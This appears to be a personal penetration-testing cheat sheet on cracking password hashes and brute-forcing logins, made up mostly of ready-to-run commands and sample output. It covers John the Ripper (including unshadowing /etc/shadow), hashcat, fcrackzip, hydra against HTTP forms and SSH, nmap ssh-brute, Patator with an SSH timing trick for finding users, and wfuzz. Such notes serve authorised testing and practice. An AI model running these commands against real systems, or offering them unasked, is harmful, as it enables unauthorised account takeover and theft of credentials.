John

sudo unshadow /etc/passwd /etc/shadow > users # for cracking

sudo
john --format=zip hash.txt
#same for rar

john <file>
--wordlist=<file.txt>
john --show <file>

--format=
# raw-md5
# raw-sha1

ssh2john
zip2john file.zip > hash.txt

rm ./root/.john/john.pot

hashcat

$ hashcat <options> <hashes_file> <wordlist> 

# attack modes
-a0 # with wordlist
-a3 # brute force
-a3 ?a?a?a?a # four chars long, any char
# ?l, u, d, h, H, s, a, b

# hash type
-m3200 # bcrypt
-m1800 # sha512crypt ($6$)
-m0 # md5
-m100 # sha1
-m1000 # NTLM (windows hashdump)
<https://hashcat.net/wiki/doku.php?id=example_hashes>

fcrackzip

$ fcrackzip -b --method 2 -D  -p /usr/share/wordlists/rockyou.txt -v ./file.zip
# -b = brute force
# --mehod 2 = zip
# -D = dictionary
# -v = verify

hydra

hydra

-l <usename> # single username
-L <usenames.txt> # file of usernames
-p <password> # single password
-P <passwords.txt> # file of passwords

<ip>

-s <port>

http-post-form "/login:username=^USER^&password=^PASS^:invalid" # or :F= ; info from browser/network/post request/headers/edit
ssh

-V # shows username/password

-t 4 # 4 threads, recommended 1/core

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/76623815-1ae8-4f70-8d54-805adcbb6e16/Untitled.png

Nmap

$ nmap <ip> --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -vvv

Patator

https://github.com/lanjelot/patator

$ patator 

# ftp enumeration
ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
[...]
19:36:07 patator    INFO - 230   17     0.001 | ftp                                |    10 | Login successful.
19:36:17 patator    INFO - 530   18     1.000 | michael                            |    50 | Permission denied.

# ftp enumeration
ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
[...]
17:45:30 patator    FAIL - xxx   41    10.001 | root                               |     1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator    FAIL - xxx   41    10.000 | john                               |    23 | <class '__main__.TimeoutError'> timed out

# http brute force
http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
http_fuzz url="<http://10.1.1.92/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login>" method=GET header="Cookie:security=low;PHPSESSID=p3tije0mp93ane756j85ar5jbv" 0=/usr/share/wordlists/rockyou.txt -x ignore:fgrep="Username and/or password incorrect."
[...]
11:53:48 patator    INFO - 200  49585:0        0.150 | root:p@ssw0rd                      |    26 | HTTP/1.1 200 OK

Wfuzz

wfuzz
-c # colour
-z file,<wordlist>.txt
-u <url>

-d “username=FUZZ&password=FUZZ”
# or
<url>api.php?username=FUZZ&password=FUZ

Notes

/usr/share/wordlists

/usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt